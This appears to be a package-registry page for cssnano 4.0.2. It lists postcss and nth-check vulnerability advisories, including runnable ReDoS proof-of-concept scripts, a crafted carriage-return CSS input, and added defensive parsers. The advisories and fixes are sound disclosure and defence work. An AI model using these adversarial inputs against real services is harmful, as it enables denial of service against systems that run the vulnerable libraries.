cssnano version 4.0.2 is a minor patch release building upon the stable 4.0.1. Both versions are modular minifiers designed to optimize CSS code, leveraging the PostCSS ecosystem, so developers can expect robust and customizable CSS minification. Both versions share identical core dependencies, including postcss, cosmiconfig, is-resolvable, and cssnano-preset-default, ensuring consistent handling of PostCSS plugins and configuration loading. The development dependencies are also the same, featuring tools like webpack, babel-cli, cross-env, babel-core, babel-loader, array-to-sentence, postcss-font-magician, cssnano-preset-advanced, and webpack-bundle-size-analyzer. The key difference is a slight change in the unpacked size of the package: 4.0.2 is marginally larger (25651 bytes) than 4.0.1 (25567 bytes). The newer version was released on July 13, 2018, a couple of days after 4.0.1, which was released on July 11, 2018. This suggests that version 4.0.2 addresses bug fixes or minor improvements identified shortly after the initial 4.0.1 release. Developers already using 4.0.1 should upgrade to 4.0.2 to benefit from these refinements, resulting in a more polished and stable cssnano and better CSS minification. Both versions share the same MIT license and repository information, ensuring transparency and open-source accessibility for developers.
All the vulnerabilities related to version 4.0.2 of the package
Regular Expression Denial of Service in postcss
The package postcss, in versions before 7.0.36 or between 8.0.0 and 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Builds "a{}" followed by n copies of the annotation opener, none of them
// closed with "*/", so every candidate match has to be retried.
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Time parse() on inputs of growing length; the cost grows faster than the length.
for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try {
            postcss.parse(attack_str)
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
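The root cause above is a greedy (.*) that is re-tried from every unterminated "/*# sourceMappingURL=" opener, so the work grows quadratically with the number of openers. The following added example (not postcss's own code) shows the defensive alternative: a scanner built on indexOf that reads each character once and ignores any comment that is never closed. The function and constant names are assumptions; the two sample inputs are constructed, the second one having the same shape as the proof of concept above.

```javascript
// Added example, not from postcss: a linear-time extractor for the
// "/*# sourceMappingURL=<url> */" annotation. indexOf() never revisits
// characters, so the cost is O(n) regardless of how many openers appear.

const ANNOTATION_PREFIX = "sourceMappingURL="; // assumed helper constant

// Returns the URL from the last well-formed annotation comment, or null.
// An unterminated comment ends the scan: nothing after it can be a closed
// annotation, so there is nothing to retry.
function findSourceMapAnnotation(css) {
  let url = null;
  let pos = 0;
  for (;;) {
    const open = css.indexOf("/*", pos);
    if (open === -1) break;
    const close = css.indexOf("*/", open + 2);
    if (close === -1) break; // unterminated comment: stop, do not backtrack
    const annotation = parseAnnotationBody(css.slice(open + 2, close));
    if (annotation !== null) url = annotation;
    pos = close + 2;
  }
  return url;
}

// Accepts a comment body of the form "<ws>#<ws>sourceMappingURL=<url><ws>"
// and returns <url>, or null when the body is not an annotation.
function parseAnnotationBody(body) {
  const trimmed = body.trim();
  if (trimmed[0] !== "#") return null;
  const rest = trimmed.slice(1).trimStart();
  if (!rest.startsWith(ANNOTATION_PREFIX)) return null;
  const value = rest.slice(ANNOTATION_PREFIX.length).trim();
  return value.length > 0 ? value : null;
}

// Constructed inputs: a normal stylesheet, and the repeated-opener shape
// used by the proof of concept above (no "*/" anywhere).
const NORMAL = "a{}/*# sourceMappingURL=a.css.map */";
const REPEATED = "a{}" + "/*# sourceMappingURL=".repeat(200000) + "!";

if (typeof require !== "undefined" && require.main === module) {
  console.log(findSourceMapAnnotation(NORMAL)); // a.css.map
  const t = Date.now();
  console.log(findSourceMapAnnotation(REPEATED)); // null
  console.log("repeated-opener input handled in " + (Date.now() - t) + " ms");
}
```

The scanner is strict about what it accepts (only a closed "/* # sourceMappingURL=... */" comment), which is the property that makes its running time independent of how the input is shaped; upgrading postcss to a fixed version remains the actual remediation.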
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts will be included in the PostCSS output in CSS nodes (rules, properties) despite originally being inside a comment.
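A linter that accepts CSS from an untrusted source can remove the ambiguity the advisory describes before the text ever reaches PostCSS. The added example below (not PostCSS's own code) normalizes every line ending to "\n" and, in strict mode, refuses input that contains a bare carriage return so the discrepancy is surfaced instead of silently repaired. Function names and the strict option are assumptions; the sample input is the one quoted in the advisory text.

```javascript
// Added example, not from PostCSS: pre-processing for untrusted CSS handed to
// a PostCSS-based linter. A "\r" that is not followed by "\n" is the character
// the advisory above singles out, so it is either rewritten or rejected.

// Offsets of every "\r" that is not immediately followed by "\n".
function findBareCarriageReturns(css) {
  const offsets = [];
  for (let i = 0; i < css.length; i++) {
    if (css.charCodeAt(i) === 0x0d && css.charCodeAt(i + 1) !== 0x0a) {
      offsets.push(i);
    }
  }
  return offsets;
}

// "\r\n" and lone "\r" both become "\n"; already-normalized input is unchanged.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, "\n");
}

// Prepares untrusted CSS for parsing (assumed API).
//   strict: true  -> throw when a bare "\r" is present, reporting where
//   strict: false -> return the text with line endings normalized
function prepareUntrustedCss(css, { strict = false } = {}) {
  const bare = findBareCarriageReturns(css);
  if (strict && bare.length > 0) {
    throw new Error("bare carriage return at offset(s) " + bare.join(", "));
  }
  return normalizeLineEndings(css);
}

// Constructed input, taken from the advisory text: the "\r" sits between the
// opening parenthesis and the comment opener.
const ADVISORY_SAMPLE = "@font-face{ font:(\r/*);}";

if (typeof require !== "undefined" && require.main === module) {
  console.log(findBareCarriageReturns(ADVISORY_SAMPLE)); // [ 18 ]
  console.log(JSON.stringify(prepareUntrustedCss(ADVISORY_SAMPLE)));
  try {
    prepareUntrustedCss(ADVISORY_SAMPLE, { strict: true });
  } catch (e) {
    console.log("strict mode rejected input: " + e.message);
  }
}
```

Strict mode is the better fit for a linter, since a bare "\r" in a stylesheet that claims to be text is itself worth flagging; normalization is the fallback for pipelines that must produce output regardless. Neither replaces upgrading to PostCSS 8.4.31 or later.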
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency, and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")

// Time parse() on "2n" followed by a growing run of spaces and a trailing "!";
// the regex has to try every split of the whitespace before it can reject the "!".
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str)
    }
    catch (err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
    }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
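The timings above grow faster than the input because the regex engine can split a long run of whitespace between the two \s* quantifiers in many ways before it gives up on the trailing "!". The added example below (not nth-check's own code) parses the same an+b grammar with a hand-written single-pass scanner, so an invalid suffix is rejected after one read of the input. The function name is an assumption; the adversarial input is constructed with the same shape as the proof of concept above.

```javascript
// Added example, not from nth-check: a backtracking-free parser for CSS
// "an+b" expressions. Every character is examined once, so the running time
// is proportional to the input length for valid and invalid input alike.

// Parses an "an+b" expression and returns [a, b]; throws on invalid syntax.
function parseNth(formula) {
  const s = formula.trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];

  let i = 0;
  const skipWs = () => { while (i < s.length && /\s/.test(s[i])) i++; };
  const readSign = () => (s[i] === "+" || s[i] === "-") ? s[i++] : "+";
  const readDigits = () => {
    const start = i;
    while (i < s.length && s[i] >= "0" && s[i] <= "9") i++;
    return s.slice(start, i);
  };

  // Leading part: [+-]?\d*n (coefficient) or a bare [+-]?\d+ (offset only).
  const sign1 = readSign();
  const digits1 = readDigits();
  let a = 0;
  let b = 0;
  if (s[i] === "n") {
    i++;
    a = digits1 === "" ? 1 : parseInt(digits1, 10);
    if (sign1 === "-") a = -a;
    skipWs();
    if (i < s.length) {
      // Offset part: whitespace is consumed exactly once on each side of the
      // sign, so there is nothing for the parser to re-try.
      const sign2 = readSign();
      skipWs();
      const digits2 = readDigits();
      if (digits2 === "") throw new Error("expected offset digits at " + i);
      b = parseInt(digits2, 10);
      if (sign2 === "-") b = -b;
    }
  } else {
    if (digits1 === "") throw new Error("expected digits or 'n' at " + i);
    b = parseInt(digits1, 10);
    if (sign1 === "-") b = -b;
  }
  skipWs();
  if (i !== s.length) throw new Error("unexpected trailing input at " + i);
  return [a, b];
}

// Constructed input with the shape of the proof of concept: "2n", a long run
// of spaces, then an invalid "!".
const ADVERSARIAL_NTH = "2n" + " ".repeat(500000) + "!";

if (typeof require !== "undefined" && require.main === module) {
  console.log(parseNth("2n + 1")); // [ 2, 1 ]
  const t = Date.now();
  try {
    parseNth(ADVERSARIAL_NTH);
  } catch (e) {
    console.log("rejected " + ADVERSARIAL_NTH.length + " chars in " + (Date.now() - t) + " ms: " + e.message);
  }
}
```

The scanner accepts the usual forms ("odd", "even", "n", "-n+3", "2n + 1", a bare integer) and reports the offset of the first byte it could not consume, which is also a more useful error for a linter than a regex mismatch. Upgrading nth-check to a fixed version remains the remediation; this illustrates why the fix is a structural one.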